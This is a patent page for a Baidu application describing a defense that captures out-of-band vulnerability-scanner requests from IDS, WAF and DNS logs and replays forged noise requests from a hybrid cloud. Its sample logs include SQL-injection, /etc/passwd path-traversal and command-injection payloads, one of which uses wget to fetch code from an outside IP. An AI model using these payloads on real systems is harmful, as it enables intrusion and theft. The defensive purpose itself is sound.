Vulnerability defense method, device, system, equipment, medium and product

By acquiring and analyzing request log data from multiple data sources, capturing out-of-band requests and constructing noise traffic, and replacing them in a hybrid cloud environment, the problem of poor defense against vulnerability scanners in the existing technology is solved, and more efficient vulnerability defense is achieved.

CN119945709APending Publication Date: 2025-05-06BEIJING BAIDU NETCOM SCI & TECH CO LTD
View PDF 0 Cites 0 Cited by

Patent Information

Application Number
CN202411835090.6
Authority / Receiving Office
CN · China
Patent Type
Applications(China)
Current Assignee / Owner
Filing Date
2024-12-12
Publication Date
2025-05-06

AI Technical Summary

Technical Problem

In the prior art, when defending against vulnerability scanner out-of-band attacks, it is difficult to refine the simulation protocol content, and the application layer firewall is difficult to effectively monitor out-of-band traffic in the UDP protocol, resulting in poor defense effects.

Method used

By acquiring the request log data of multiple data sources, capturing out-of-band request data, constructing the second out-of-band request data based on malicious request information transmitted by the message queue, and playing back the data in a hybrid cloud environment to form the determination result of the noise traffic interference vulnerability scanner.

Benefits of technology

It realizes all-round automatic identification of different types of out-of-band scanning behaviors. By constructing and replaying forged request data, interfering with the judgment results of the vulnerability scanner, improving the defense effect and effectively hiding the vulnerability.

✦ Generated by Eureka AI based on patent content.

Smart Images

  • Figure CN119945709A_ABST
    Figure CN119945709A_ABST
Patent Text Reader

Abstract

The invention discloses a vulnerability defense method, device and system, equipment, a medium and a product. The method comprises the following steps: acquiring request log data of a plurality of data sources, wherein the plurality of data sources at least comprise a network flow data source, an application firewall log data source and a domain name system log data source; capturing first out-of-band request data in the request log data, wherein the first out-of-band request data represents that an out-of-band scanning behavior for vulnerabilities exists; constructing second out-of-band request data based on malicious request information of the first out-of-band request data transmitted by the message queue; in a hybrid cloud environment, playing back the second out-of-band request data; wherein the hybrid cloud environment comprises a public cloud environment and a private cloud environment. In this way, automatic capture of the first out-of-band request data is achieved, meanwhile, the second out-of-band request data is constructed, the second out-of-band request data is played back in the mixed cloud environment, noise flow is formed to interfere with the vulnerability scanner, and the effect of active defense is achieved.
Need to check novelty before this filing date? Find Prior Art

Description

Technical Field

[0001] The present application relates to the field of network security technology, and in particular to a vulnerability defense method, device, system, equipment, medium and product. Background Art

[0002] In the attack and defense confrontation, attackers usually use vulnerability scanners to collect vulnerability information. To verify the existence of the vulnerability and its scope of impact, attackers often use out-of-band technology, such as DNSLog, which is a technology that stores the domain name information of the vulnerability scan on the DNS (Domain Name System) server. In this way, attackers can use DNS requests to confirm the true situation of the vulnerability.

[0003] In the related art, the traditional security device's defense against out-of-band scanners is usually to use a firewall (WAF, Web Application Firewall) to resist attacks from out-of-band vulnerability scanners. Specifically, WAF identifies and interferes with known malicious domain names by matching the header field and body field in HTTP requests, thereby achieving defense.

[0004] However, the above-mentioned defense measures have the following shortcomings: (1) It is difficult to simulate the protocol content in a refined manner. For example, when detecting a vulnerability in the log library Log4j, the scanner will perform detection through a JDNI (Java Naming and Directory Interface) request; or when detecting a FastJSON (Fast JSON Library) vulnerability, the scanner will perform a DNS request detection, but most firewall products on the market can only recognize HTTP protocol requests, and their simulation capabilities are weak, making them easy to be identified and circumvented by attackers. (2) Interference detection mostly relies on application layer firewalls to identify and interfere with malicious domain names. However, attackers can circumvent detection by application layer firewalls by hiding the return DNSLog address in UDP (User Datagram Protocol). Due to the characteristics of the UDP protocol itself, it is difficult for application layer firewalls to effectively monitor this type of out-of-band traffic, resulting in a large number of attack requests being missed and poor defense effects. Summary of the invention

[0005] In view of this, the embodiments of the present application provide a vulnerability defense method, device, system, equipment, medium and product, which aim to solve the problem of how to achieve active defense against vulnerability attacks and thus improve the defense effect.

[0006] The technical solution of the embodiment of the present application is implemented as follows:

[0007] In a first aspect, an embodiment of the present application provides a vulnerability defense method, the method comprising:

[0008] Obtaining request log data from multiple data sources, the multiple data sources at least including: a network traffic data source, an application firewall log data source, and a domain name system log data source;

[0009] Capturing first out-of-band request data in the request log data, where the first out-of-band request data indicates that there is an out-of-band scanning behavior for a vulnerability;

[0010] constructing second out-of-band request data based on malicious request information of first out-of-band request data transmitted by the message queue;

[0011] In a hybrid cloud environment, the second out-of-band request data is played back; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

[0012] In some embodiments, capturing the first out-of-band request data in the request log data includes:

[0013] Based on the pattern matching rule and the request log data, capturing first out-of-band request data in the request log data;

[0014] The first out-of-band request data is request log data that matches the pattern matching rule.

[0015] In some embodiments, the pattern matching rule includes: a first matching rule and a second matching rule, and capturing the first out-of-band request data in the request log data based on the pattern matching rule and the request log data includes:

[0016] If the request log data includes network traffic log data, capturing the first out-of-band request data based on the network traffic log data, the first parsing rule and the first matching rule or the second matching rule;

[0017] Among them, the first matching rule includes a pattern library, and the pattern library includes network packet sending tool information, network protocol information and vulnerability detection object information; the second matching rule includes blacklist domain name data.

[0018] In some embodiments, the vulnerability detection object information includes uniform resource locator data or network address data, and the blacklist domain name data includes DNSLog domain name blacklist data.

[0019] In some embodiments, capturing the first out-of-band request data based on the network traffic log data, the first parsing rule and the first matching rule or the second matching rule includes:

[0020] Parsing the network traffic log data based on the first parsing rule to generate parsed network traffic data; the parsed network traffic data includes: uniform resource locator and domain name information;

[0021] Based on the uniform resource locator, the domain name information and the first matching rule or the second matching rule, the first out-of-band request is captured; wherein the first out-of-band request data is network traffic log data that matches the first matching rule or the second matching rule.

[0022] In some embodiments, the method further comprises:

[0023] If the request log data includes application firewall log data, the first out-of-band request data is captured based on the application firewall log data, the second parsing rule, and the first matching rule or the second matching rule.

[0024] In some embodiments, capturing the first out-of-band request data based on the application firewall log data, the second parsing rule, and the first matching rule or the second matching rule includes:

[0025] Parsing the application firewall log data based on the second parsing rule to generate parsed application firewall log data; the parsed application firewall log data includes a uniform resource locator;

[0026] Based on the uniform resource locator and the first matching rule or the second matching rule, the first out-of-band request is captured; wherein the first out-of-band request data is application firewall log data that matches the first matching rule or the second matching rule.

[0027] In some embodiments, the method further comprises:

[0028] If the log data is domain name system log data, the first out-of-band request data is captured based on the domain name system log data, the third parsing rule and the second matching rule.

[0029] In some embodiments, capturing the first out-of-band request data based on the domain name system log data, the third resolution rule, and the second matching rule includes:

[0030] Parsing the domain name system log data based on the third parsing rule to generate parsed domain name system log data, wherein the parsed domain name system log data includes domain name information;

[0031] Based on the domain name information and the second matching rule, capturing the first out-of-band request data;

[0032] The first out-of-band request data is domain name system log data that matches the second matching rule.

[0033] In some embodiments, before constructing the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue, the method further includes:

[0034] Verify whether the first out-of-band request data is legal; if so, construct second out-of-band request data based on malicious request information of the first out-of-band request data transmitted by the message queue.

[0035] In some embodiments, the method further comprises:

[0036] If the first out-of-band request data is verified to be legal, determine whether the first-level domain name information of the malicious request information is in the whitelist; if not, construct the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue.

[0037] In some embodiments, constructing the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue includes:

[0038] Sending the malicious request information to a sandbox environment;

[0039] Obtaining a simulation execution result for malicious request information sent by the sandbox environment;

[0040] Based on the simulation execution result of the sandbox, the second out-of-band request data is constructed.

[0041] In some embodiments, the sandbox environment includes a pseudo terminal module and a sub-process module, the pseudo terminal module is used to simulate terminal requests, and the sub-process module is used to simulate request operations.

[0042] In some embodiments, the simulation execution result of the sandbox includes: a plurality of symbol fields, a domain name field, and a network address field, and constructing the second out-of-band request data based on the simulation execution result of the sandbox includes:

[0043] The multiple symbol fields, the preprocessed domain name field and the preprocessed network address field are concatenated to construct the second out-of-band request data.

[0044] In some embodiments, the multiple symbol fields include: a backquote field, an exclamation point field, and a space field, and the multiple symbol fields, the preprocessed domain name field, and the preprocessed network address field are concatenated to construct the second out-of-band request data, including:

[0045] Based on the backquote field, the exclamation point field, the space field, the preprocessed domain name field and the preprocessed network address field, splicing is performed to construct the second out-of-band request data.

[0046] In some embodiments, in the hybrid cloud environment, playing back the second out-of-band request data includes:

[0047] In the hybrid cloud environment, the second out-of-band request data is replayed based on multi-protocol simulation rules, the multi-protocol simulation rules include DNS protocol simulation rules and HTTP protocol simulation rules, and the second out-of-band request data includes constructed DNS request data or constructed HTTP request data.

[0048] In a second aspect, an embodiment of the present application provides a vulnerability protection device, the device further comprising:

[0049] An acquisition module, used to acquire request log data from multiple data sources, wherein the multiple data sources include at least: a network traffic data source, an application firewall log data source, and a domain name system log data source;

[0050] A capture module, configured to capture first out-of-band request data in the request log data, wherein the first out-of-band request data indicates that there is an out-of-band scanning behavior for a vulnerability;

[0051] A construction module, configured to construct second out-of-band request data based on malicious request information of first out-of-band request data transmitted by a message queue;

[0052] A playback module is used to play back the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

[0053] In a third aspect, an embodiment of the present application further provides a vulnerability defense system, the system comprising:

[0054] An out-of-band request capture module is used to obtain request log data from multiple data sources, wherein the multiple data sources include at least: a network traffic data source, an application firewall log data source, and a domain name system log data source; capture first out-of-band request data in the request log data, wherein the first out-of-band request data indicates the existence of an out-of-band scanning behavior for a vulnerability;

[0055] A noise traffic injection module is used to construct second out-of-band request data based on malicious request information of first out-of-band request data transmitted by a message queue; and to replay the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

[0056] In some embodiments, the noise flow injection module includes:

[0057] The request construction module is used to construct second out-of-band request data based on malicious request information of first out-of-band request data transmitted by the message queue.

[0058] In a fourth aspect, an embodiment of the present application provides an electronic device, comprising: a processor and a memory for storing a computer program that can be run on the processor, wherein when the processor is used to run the computer program, it executes the steps of the method described in the first aspect of the embodiment of the present application.

[0059] In a fifth aspect, an embodiment of the present application provides a storage medium having a computer program stored thereon. When the computer program is executed by a processor, the steps of the method described in the first aspect are implemented.

[0060] In a sixth aspect, an embodiment of the present application provides a computer program product, including a computer program, which, when executed by a processor, implements the steps of the method described in the first aspect.

[0061] The technical solution provided by the embodiment of the present application is a vulnerability defense method, comprising: obtaining request log data from multiple data sources, the multiple data sources at least including: a network traffic data source, an application firewall log data source, and a domain name system log data source; capturing first out-of-band request data in the request log data, the first out-of-band request data representing the existence of out-of-band scanning behavior for the vulnerability; constructing second out-of-band request data based on malicious request information of the first out-of-band request data transmitted by a message queue; and replaying the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

[0062] In this way, the embodiment of the present application can automatically identify different types of out-of-band scanning behaviors in an all-round manner by automatically capturing out-of-band requests from multiple data sources. At the same time, based on the captured first out-of-band request, a second out-of-band request is constructed and played back in a hybrid cloud environment to form noise traffic for confusion, interfering with the vulnerability determination results of the vulnerability scanner, thereby hiding the vulnerability from external exposure and achieving the effect of active defense. This method is not only for scanners, but can also effectively interfere with the out-of-band behavior of RCE vulnerabilities facing real attackers. BRIEF DESCRIPTION OF THE DRAWINGS

[0063] Figure 1 A schematic diagram of the structure of a vulnerability protection system provided in an embodiment of the present application;

[0064] Figure 2 A schematic diagram of a process flow of a vulnerability defense method provided in an embodiment of the present application;

[0065] Figure 3 A schematic diagram of the workflow of the out-of-band request capture module provided in an embodiment of the present application;

[0066] Figure 4 A schematic diagram of the workflow of the noise flow injection module provided in an embodiment of the present application;

[0067] Figure 5 A schematic diagram of the deployment architecture of a hybrid cloud environment provided in an embodiment of the present application;

[0068] Figure 6 A schematic diagram of the structure of a vulnerability protection device provided in an embodiment of the present application;

[0069] Figure 7 A schematic diagram of the structure of an electronic device provided in an embodiment of the present application. DETAILED DESCRIPTION

[0070] The present application is further described in detail below in conjunction with the accompanying drawings and embodiments.

[0071] Unless otherwise defined, all technical and scientific terms used herein have the same meaning as those commonly understood by those skilled in the art to which this application belongs. The terms used herein in the specification of this application are only for the purpose of describing specific embodiments and are not intended to limit this application.

[0072] The present application also provides a vulnerability defense system. Figure 1 As shown, the vulnerability defense system includes: an out-of-band request capture module 1 and a noise traffic injection module 2. Here, the out-of-band request capture module 1 is used to capture a first out-of-band request, and the message queue is used to transmit the first out-of-band request to the noise traffic injection module 2.

[0073] Here, the out-of-band request capture module 1 is used to obtain request log data from multiple data sources, and the multiple data sources include at least: a network traffic data source, an application firewall log data source, and a domain name system log data source; capture the first out-of-band request data in the request log data, and the first out-of-band request data represents the existence of out-of-band scanning behavior for vulnerabilities.

[0074] Exemplarily, the out-of-band request capture module 1 is used to capture the request for vulnerability scanning using out-of-band technology from network traffic, web logs and DNS logs, namely, the first out-of-band request data. Specifically, (1) the traffic data monitored by a) the network interface is output by the suricata module; b) the web log is output by the WAF module; c) the DNS log is output by the DNS traffic processing module. (2) the first out-of-band request data is captured; (3) the first out-of-band request data is forwarded to the noise injection interface of the noise traffic injection module through the kafka message queue.

[0075] Here, the noise traffic injection module 2 is used to construct second out-of-band request data based on malicious request information of the first out-of-band request data transmitted by the message queue; and replay the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

[0076] In some embodiments, the noise injection module includes: a request construction module, configured to construct second out-of-band request data based on malicious request information of first out-of-band request data transmitted by a message queue.

[0077] The present application also provides a vulnerability defense method, such as Figure 2 As shown, the method comprises the following steps:

[0078] Step 210: Obtain request log data from multiple data sources, where the multiple data sources include at least: a network traffic data source, an application firewall log data source, and a domain name system log data source.

[0079] Here, in order to be able to comprehensively discover out-of-band scanning behaviors faced by assets on the Internet, the embodiment of the present application obtains log data from multiple data sources. The multiple data sources at least include: network traffic data source, application firewall (WAF) log data source and domain name system (DNS) log data source.

[0080] The network traffic data source is used to capture traffic data from the network, usually obtained through network monitoring equipment (such as Suricata, etc.). Suricata is a high-performance network intrusion detection system (IDS, Intrusion Detection System) used to detect malicious behavior in network traffic and process non-encrypted traffic.

[0081] For example, network traffic data can record all network activities. Figure 3 As shown, the network traffic data includes: IDS traffic and honeypot traffic; for IDS traffic, the traffic can be decrypted based on the use of DPDK (Data Plane Development Kit) and session keys. For honeypot traffic, SSL (Secure Sockets Layer) traffic is unloaded, that is, the encrypted traffic is decrypted. The decrypted traffic is sent to the Suricata module for analysis.

[0082] In practical applications, the Suricata module can obtain the log data of the network traffic data source through network interface monitoring. For example, the log data monitored by the Suricata module through the network interface is shown in Table 1 below:

[0083] Table 1

[0084]

[0085]

[0086] Here, Payload usually refers to the data part in network communication, that is, the content of the data packet excluding the header. In HTTP requests, DNS requests or other network protocols, Payload contains the actual data sent or received.

[0087] In Table 1, payload_printable includes:

[0088] 1. SQL injection attack attempt

[0089] POST / cms / content / listHTTP / 1.1\r\n

[0090] Host:2.3.4.5\r\n

[0091] User-Agent:Mozilla / 5.0(Windows NT 10.0;WOW64)AppleWebKit / 537.36(KHTML,like Gecko)Chrome / 71.0.3578.98Safari / 537.36\r\n

[0092] Content-Length:81

[0093] Content-Type:application / x-www-form-urlencoded

[0094] Accept-Encoding:gzip

[0095] categoryId=1'and updatexml(1,concat(0x7e,md5("94319067"),0x7e),1)and'zzz'='zzz

[0096] From the above payload content, we can see that the attacker tried to exploit the vulnerability in the application by inserting malicious SQL statements in the query parameters. The updatexml() function and the md5() function were used here to generate errors and leak database information.

[0097] Here, payload_printable also includes:

[0098] 2. File inclusion attack attempts

[0099] GET / index.php? option=com_jvideodirect&controller=.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / etc / p asswd%00HTTP / 1.1\r\n

[0100] Host:2.3.4.5\r\n

[0101] User-Agent:Mozilla / 5.0(Windows NT 10.0;WOW64)AppleWebKit / 537.36(KHTML,like Gecko)Chrome / 71.0.3578.98Safari / 537.36\r\n

[0102] Accept-Encoding:gzip

[0103] 3. Remote Code Execution (RCE) Attempt

[0104] POST / system / sharedir.php HTTP / 1.1\r\n

[0105] Host:2.3.4.5\r\nUser-Agent:Mozilla / 5.0(Windows NT 10.0; WOW64)

[0106] AppleWebKit / 537.36(KHTML,like Gecko)Chrome / 71.0.3578.98Safari / 537.36\r\n

[0107] Content-Length:56\r\n

[0108] Content-Type:application / x-www-form-urlencoded\r\n

[0109] Accept-Encoding:gzip\r\n\r\n

[0110] &uid=10;wgethttp: / / 5.6.7.8:8111 / i / 7e6df8 / etog / ciyq /

[0111] Here, a remote code execution (RCE) attack occurs when an attacker attempts to execute remote commands by inserting commands into request parameters, such as downloading and running malicious scripts from an external server.

[0112] 4. Command injection attack attempt

[0113] GET / mbilling / lib / icepay / icepay.php? democ= / dev / null;ping%20;HTTP / 1.1\r\n"

[0114] Here, the attacker attempts to execute system commands, such as ping, by inserting commands in the query string.

[0115] Here, payload_printabl includes multiple HTTP requests, which demonstrates many common web application attack methods, including SQL injection, file inclusion, remote code execution, and command injection.

[0116] Here, WAF (Web Application Firewall) is used to protect web applications from common attacks (such as SQL injection, XSS, etc.).

[0117] like Figure 2 As shown in Table 2, the application firewall (WAF)-web log data source records the requests of the web server access log, including the source of the request, request header, request body and other information. These logs can help discover abnormal request patterns or malicious activities. For example, the application firewall log data is shown in Table 2 below:

[0118] Table 2

[0119]

[0120] The request body also includes:

[0121] \"content-length\":\"64\",\"user-agent\":\"Mozilla / 5.0(X11;Linux x86_64)AppleWebKit / 537.36(KHTML,like Gecko)

[0122] Chrome / 60.0.3112.32

[0123] Safari / 537.36\",\"host\":\"www.xx.com\",\"accept-encoding\":\"gzip\",\"connection\":\"close\",\"content-type\":\"application / x-www-form-urlencoded\"}

[0124] The content of the request body in Table 2 above is a command injection attack triggered by an HTTP request, such as an attempt to download malicious code through the wget command.

[0125] Here, if Figure 3 As shown in Table 3, the Domain Name System Log (DNSLog) records DNS outbound requests, which are usually initiated by attackers when using out-of-band technology to perform vulnerability scans. Attackers use the DNS backlink mechanism to confirm whether the target system has vulnerabilities by sending specific requests to the DNS server. DNSLog can capture these requests, so it becomes a clue to identify out-of-band vulnerability scanning behavior. As shown in Table 3:

[0126] Table 3

[0127]

[0128] It can be understood that what is obtained in Table 3 is the DNS log data obtained by monitoring, also called PDNS (Passive DNS) data. PDNS (Passive DNS) data usually refers to DNS log data, but unlike traditional DNS logs, PDNS data is passively collected DNS request information. It records DNS queries and their response results, but does not involve active DNS requests.

[0129] In this way, the embodiments of the present application can obtain multiple data sources with rich data sources, relying on cloud IDS data, honeypot cluster data, WAF real-time alarm data and PDNS data, so as to fully discover the out-of-band scanning behavior faced by enterprise assets on the Internet.

[0130] Step 220: Capture first out-of-band request data in the request log data, where the first out-of-band request data indicates that there is an out-of-band scanning behavior for a vulnerability.

[0131] It is understandable that an out-of-band request refers to an attacker's behavior of performing vulnerability scanning or data out-of-band through non-traditional protocols (such as DNS, HTTP, etc.). Here, capture refers to identifying the first out-of-band request data that meets the characteristics of out-of-band attacks in the log data. The first out-of-band request data indicates that the attacker is using out-of-band technology to scan vulnerabilities or steal data. The first out-of-band request data indicates the existence of out-of-band scanning behavior for vulnerabilities.

[0132] Here, after the log data is obtained, it is necessary to capture the first out-of-band request data from different types of log data.

[0133] Step 230: Construct second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue.

[0134] In the embodiment of the present application, the captured first out-of-band request data will be processed through message queue transmission to convert the original data into a standard format. As a high-throughput distributed messaging system, Kafka provides higher concurrency and scalability, thereby improving the processing efficiency of out-of-band requests. For example, Figure 3 As shown, the first out-of-band request data can be transmitted and processed through the Kafka message queue.

[0135] Malicious request information refers to requests that carry malicious payloads. Such payloads are sent to the target system through a specific request method (such as HTTP request or DNS request) and may contain malicious inputs such as command injection, SQL injection, or file upload. Based on the malicious request information transmitted through the message queue, the second out-of-band request data is further constructed.

[0136] Step 240: Play back the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

[0137] Here, considering that the traditional interference deployment environment is based on a single machine environment, a large number of queues are accumulated, which makes it impossible to complete the forged obfuscation request in a timely and effective manner. The counter-reaction request is played back in a single network environment, which is easy to be identified by the aggregation of access sources.

[0138] It is understandable that the hybrid cloud environment includes a public cloud environment and a private cloud environment. Playback refers to resending the second out-of-band request constructed in step 230 to the target system or service.

[0139] In the hybrid cloud environment, the embodiment of the present application replays the constructed second out-of-band request to disperse the access source and avoid aggregation in a single network environment. The security of the system is ensured by verifying the vulnerability protection effect across multiple cloud platforms. Through distributed processing in a multi-cloud environment, the processing speed and efficiency of forged requests can be effectively improved.

[0140] In this way, the embodiment of the present application can fully identify different types of out-of-band scanning behaviors by capturing out-of-band requests from multiple data sources. At the same time, based on the captured first out-of-band request, a second out-of-band request is constructed and played back in a hybrid cloud environment to form noise traffic for confusion, thereby interfering with the vulnerability determination results of the vulnerability scanner, thereby hiding the vulnerability from external exposure and achieving the effect of active defense. This method is not only aimed at scanners, but RCE attacks (remote code execution vulnerabilities) also usually rely on out-of-band technologies (such as DNS, HTTP feedback, etc.) to steal or leak sensitive data or perform malicious operations. Therefore, the out-of-band behavior of the RCE vulnerability facing a real attacker can also be effectively interfered with.

[0141] In some embodiments, capturing the first out-of-band request data in the request log data includes:

[0142] Based on the pattern matching rule and the request log data, capturing first out-of-band request data in the request log data;

[0143] The first out-of-band request data is request log data that matches the pattern matching rule.

[0144] It is understandable that after obtaining the log data, in order to capture out-of-band request data from different types of log data, it is necessary to perform pattern matching on the log data based on pattern matching rules to accurately capture the out-of-band request data in the request log data.

[0145] For example, Figure 3 As shown, out-of-band request pattern matching refers to extracting specific information (such as URL or domain name) from different data sources (such as network traffic log data, WAF-web log data source, DNSLog data source, etc.), and then matching this information based on pattern matching rules. The request log data that matches the pattern matching rules is the first out-of-band request data.

[0146] In some embodiments, the pattern matching rule includes: a first matching rule and a second matching rule, and based on the pattern matching rule and the request log data, capturing the first out-of-band request data in the request log data includes:

[0147] If the request log data includes network traffic log data, capturing the first out-of-band request data based on the network traffic log data, the first parsing rule and the first matching rule or the second matching rule;

[0148] Among them, the first matching rule includes a pattern library, and the pattern library includes network packet sending tool information, network protocol information and vulnerability detection object information; the second matching rule includes blacklist domain name data.

[0149] It is understandable that before performing pattern matching, in order to accurately capture out-of-band requests, it is necessary to parse the log data of different data sources. Parse the network traffic log data to extract the source and destination information of the request, and convert the original network traffic data into structured information for subsequent matching and analysis.

[0150] For example, if the log data is network traffic log data, such as Figure 3 As shown, for the network traffic log data extracted by the Suricata module, the first out-of-band request data can be captured based on the network traffic log data, the first parsing rule and the first matching rule or the second matching rule.

[0151] Here, the first matching rule includes a pattern library, which includes: (1) network packet sending tool information. For example, common network scanning tools (such as Nmap), HTTP clients (such as curl, wget), etc. Attackers often use these tools to initiate out-of-band scanning and send malicious requests through these tools, so identifying the characteristics of these tools can help capture malicious requests. (2) Network protocol information. Including but not limited to information on common network protocols such as HTTP, HTTPS, DNS, etc. (3) Vulnerability detection object information. This information helps identify the target of out-of-band scanning, such as URLs or specific IP addresses containing known vulnerabilities. Malicious requests may contain these URLs or IPs, so by comparing the target information in the log, the first out-of-band request data can be captured. The second matching rule includes blacklist domain name data. The domain name data in the blacklist can help identify malicious domain name requests, so out-of-band requests can be captured.

[0152] In some embodiments, the vulnerability detection object information includes uniform resource locator data or network address data, and the blacklist domain name data includes DNSLog domain name blacklist data.

[0153] It is understood that the uniform resource locator (URL) data is the address of an Internet resource, which contains the location and access path of the resource. For example, a URL can point to a web page (such as https: / / example.com / page). The URL data in the vulnerability detection object information is used to check whether there are vulnerabilities in the web page or network resources, such as cross-site scripting attacks (XSS) or SQL injection. The network address data is the IP address, which identifies the location of the computer or device on the network.

[0154] In some embodiments, capturing first out-of-band request data based on network traffic log data, a first parsing rule, and a first matching rule or a second matching rule includes:

[0155] Parsing the network traffic log data based on the first parsing rule to generate parsed network traffic data; the parsed network traffic data includes: uniform resource locator and domain name information;

[0156] Based on the uniform resource locator, the domain name information and the first matching rule or the second matching rule, a first out-of-band request is captured; wherein the first out-of-band request data is network traffic log data that matches the first matching rule or the second matching rule.

[0157] The embodiment of the present application parses the network traffic log data based on the first parsing rule to generate parsed data. During the parsing process, key information (such as URL and domain name) can be extracted from the network traffic log to identify the specific source and target of the request.

[0158] Here, the parsed data includes uniform resource locators (URLs) and domain name information to identify specific request types and source / destination addresses associated with network traffic. By converting raw logs into structured data, the system can apply matching rules more accurately and capture the first out-of-band request data.

[0159] For example, for the network traffic data in the module of Table 1 above, it can be parsed according to the first parsing rule to obtain the parsed data, including http_url (URL request) and domain (domain name) information. The specific format is shown in Table 4 below:

[0160] Table 4

[0161]

[0162] Exemplarily, in the actual matching process, based on the pattern library in the first matching rule, it can be checked whether the parsed URL and domain name match the characteristics of the network packet sending tool, network protocol, vulnerability detection object, etc. Or, based on the second matching rule, it is checked whether the parsed domain name appears in the blacklist domain name. Capture out-of-band request data: If the request data in the log matches any matching rule (the first matching rule or the second matching rule), the request data will be the first out-of-band request data.

[0163] In some embodiments, the method further comprises:

[0164] If the request log data includes application firewall log data, the first out-of-band request data is captured based on the application firewall log data, the second parsing rule, and the first matching rule or the second matching rule.

[0165] Here, if the request log data includes application firewall log data, such as Figure 3As shown, the first out-of-band request data is captured based on the application firewall log data output by the waf module, the second parsing rule and the first matching rule or the second matching rule.

[0166] In some embodiments, capturing the first out-of-band request data based on the application firewall log data, the second parsing rule, and the first matching rule or the second matching rule includes:

[0167] Parsing the application firewall log data based on the second parsing rule to generate parsed application firewall log data; the parsed application firewall log data includes a uniform resource locator;

[0168] Based on the uniform resource locator and the first matching rule or the second matching rule, a first out-of-band request is captured; wherein the first out-of-band request data is application firewall log data that matches the first matching rule or the second matching rule.

[0169] For example, for WAF logs, logs usually contain HTTP request information, so only the uniform resource locator URL request needs to be extracted. Therefore, the application firewall log data can be parsed based on the second parsing rule to generate parsed application firewall log data; the parsed application firewall log data includes the uniform resource locator http_url (URL request) field. Among them, the first out-of-band request data is the application firewall log data that matches the first matching rule or the second matching rule.

[0170] For example, the parsed application firewall log data is shown in Table 5:

[0171] Table 5

[0172]

[0173] Exemplarily, in the actual matching process, based on the pattern library in the first matching rule, it can be checked whether the parsed URL matches the characteristics of the network packet sending tool, network protocol, vulnerability detection object, etc. Or, based on the second matching rule, it is checked whether the parsed domain name appears in the blacklist domain name. Capturing out-of-band request data: If the request data in the application firewall log data matches any matching rule (the first matching rule or the second matching rule), the request data will be the first out-of-band request data.

[0174] In some embodiments, the method further comprises:

[0175] If the log data is domain name system log data, the first out-of-band request data is captured based on the domain name system log data, the third parsing rule and the second matching rule.

[0176] In some embodiments, capturing the first out-of-band request data based on the domain name system log data, the third resolution rule, and the second matching rule includes:

[0177] Parsing the domain name system log data based on the third parsing rule to generate parsed domain name system log data, wherein the parsed domain name system log data includes domain name information;

[0178] Based on the domain name information and the second matching rule, capturing the first out-of-band request data;

[0179] The first out-of-band request data is domain name system log data that matches the second matching rule.

[0180] Exemplarily, for DNSLog data, the DNSLog data is parsed based on the third parsing rule to obtain parsed domain name system log data, and the parsed domain name system log data includes a domain (domain name) field.

[0181] As shown in Table 6, Table 6 is the DNSLog data after parsing.

[0182] Table 6

[0183]

[0184] Exemplarily, for dnslog data, a predicted dnslog domain name is matched using the blacklist domain name in the second matching rule. If the match is successful, it is the first out-of-band request data, and the first out-of-band request data is the domain name system log data that matches the second matching rule.

[0185] In some embodiments, before constructing the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue, the method further includes:

[0186] Verify whether the first out-of-band request data is legal; if so, construct second out-of-band request data based on malicious request information of the first out-of-band request data transmitted by the message queue.

[0187] It is understandable that before constructing the second out-of-band request data, it is necessary to confirm whether the first out-of-band request data is legal, and then construct the second out-of-band request data after confirming its legality. In this way, by verifying the legality of the first out-of-band request data, it is possible to ensure that the construction of the second out-of-band request data is more accurate, thereby improving the active defense effect.

[0188] In some embodiments, the method further comprises:

[0189] If the first out-of-band request data is verified to be legal, determine whether the first-level domain name information of the malicious request information is in the whitelist; if not, construct the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue.

[0190] It is understandable that before constructing the second out-of-band request data, the first out-of-band request data should be verified to be legal. After confirmation, the first-level domain name and the whitelist domain name list should be compared for filtering. After the screening is completed, the next step is to send the first out-of-band request data to the sandbox for command parsing, thereby constructing the second out-of-band request data.

[0191] It is understandable that the first-level domain information is the main domain part of the domain name (such as example.com), which is the most basic part of the domain name and usually points to a specific site or service. In out-of-band scanning, attackers often use the first-level domain name for malicious access, so it is necessary to confirm whether the domain name is legal and trusted. The whitelist list contains trusted domain names, which means that requests from these domain names are legal and do not need to be blocked or intercepted.

[0192] For example, Figure 4 As shown, in the embodiment of the present application, the whitelist refers to an out-of-band request initiated by a non-self-built scanner. The first out-of-band request can be verified based on the out-of-band request initiated by the non-self-built scanner. Once the first out-of-band request is successfully verified, a second out-of-band request can be constructed based on the malicious request information of the first out-of-band request.

[0193] In this way, by performing legitimacy verification and whitelist filtering on the first out-of-band request data, it is ensured that only malicious request information that meets the conditions will be further processed, thereby accurately constructing the second out-of-band request data.

[0194] In some embodiments, constructing second out-of-band request data based on malicious request information of first out-of-band request data transmitted by a message queue includes:

[0195] Send malicious request information to the sandbox environment;

[0196] Obtain the simulated execution results for malicious request information sent by the sandbox environment;

[0197] Based on the simulated execution result of the sandbox, second out-of-band request data is constructed.

[0198] It is understandable that in vulnerability defense or malicious request simulation, the Bash sandbox prevents the host operating system or actual application from being affected by the executed command or script in an isolated environment. Even if the malicious command is executed, it will not affect the security of the system.

[0199] For example, Figure 4 As shown, after the first out-of-band request is output through the Kafka message queue, it is first necessary to verify whether the first-level domain name of the first out-of-band request output by the message queue appears in the whitelist. Here, if the first out-of-band request is not in the whitelist, the malicious request information of the first out-of-band request data is sent to the sandbox environment for further processing. The sandbox environment is used to simulate the attacker's request and take isolation and protection measures to avoid damage to the actual system.

